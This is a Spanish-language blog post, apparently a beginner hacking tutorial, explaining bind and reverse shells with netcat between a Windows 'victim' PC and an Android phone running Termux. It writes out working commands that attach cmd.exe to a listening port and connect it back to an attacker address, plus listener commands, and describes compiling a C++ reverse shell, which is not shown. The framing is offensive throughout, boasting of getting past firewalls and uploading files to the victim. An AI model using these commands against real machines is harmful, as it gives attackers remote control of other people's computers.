Estaba aburrido como siempre así que pensé no hay ningún blog (Aparte de este) donde usen esta bonita herramienta llamada Netcat y este otro lenguaje llamado C o C++ para ataques, entonces me dije traigamos algo sencillo para empezar a ver si otros se motivan atraer cosas mas interesantes.
Primero debemos saber que es una shell, según Wikipedia una Shell es «En informática, el shell o intérprete de órdenes o intérprete de comandos es el programa informático que provee una interfaz de usuario para acceder a los servicios del sistema operativo», entonces, ¿Qué es una Shell Directa?
Shell Directa
Una Shell directa es un ataque dónde (nosotros) se conectara a la maquina Victima y tendremos, en este caso sera windows (Mi PC) y la maquina atacante mi celular (Usando Termux), la desventaja de hacerlo de forma directa es que cualquier firewall nos puede impedir esto así que en el proceso probablemente vean algo como esto
Windows 10
1
nc -l -n -p 4444 -e cmd.exe
Comandos:
-
-i:
Pone a netcat en modo escucha. (Listen mode) -
-n:
Omite las búsquedas de DNS de la maquina -
-p;
Puerto -
-e:
Aquí pondremos la shell en nuestro caso CMD, para linux; /bin/bash, bash puede cambiar, por ejemplo, zsh, ya depende de lo que use la victima.
Mi celular (Desde Termux)
1
nc -vv IP 4444
Comandos
-vv
Para tener toda la información detallada
Pondré el comando dir para ver los archivos dentro de la carpeta Netcat desde mi celular atacante :T
cd \..\..
para retroceder, como ven puedo hacer cualquier cosa hasta con mas imaginación puedo subir algún archivo divertido. :]
Shell inverso.
Bueno en el otro método como os dije su desventaja es que al tratar de conectarnos la maquina nos bloquea de inmediato y no podemos hacer la conexión remota a la maquina, es por eso que haremos lo contrario, es decir, la maquina victima se conectara a nosotros los atacantes y nosotros solo haremos escucha de nuestra victima, y como no, le damos un café por tal generosidad:
Mi celular (Desde Termux)
1
nc -n -vv -l -p 4444
comandos
-n
Le decimos que no lea los DNS de nombre sobre la maquina-vv
información detallada.-l
Listen mode-p
Puerto
Windows
1
nc -e cmd.exe -n -v 192.168.1.79 4444
Nos conectamos a nosotros… Y.. :]
Puse un Hola mundo en C++ de ejemplo de que podemos ejecutar cualquier cosa.
Ahora bien, como vemos ni bloqueando todos los puertos o confiarse de firewalls mal configurados no impide deque podamos hacer muchas cosas, esto es un ejemplo practico porque podemos hacer cosas mejores un ejemplo de ello: hacking con html. También podemos hacer uso de lenguajes como C++, Perl, Python, etc. Para crear nuestras shells inversas, pondré un código sencillo en C++ (Hay muchas así hasta mejores, pero aun así aplica para lo que están aprendiendo de manera sencilla y eficaz)
Y lo mismo que en la shell reverse, compilamos g++ shell.cpp -o shell y luego hacemos escucha desde nuestra pc atacante nc -n -vv -l -p 4444
, ponemos ./shell
en la pc victima y wala.
Espero que les guste este blog como a mi me gusto escribirlo; No existe un lugar para esconderse. A donde vayas todos están conectados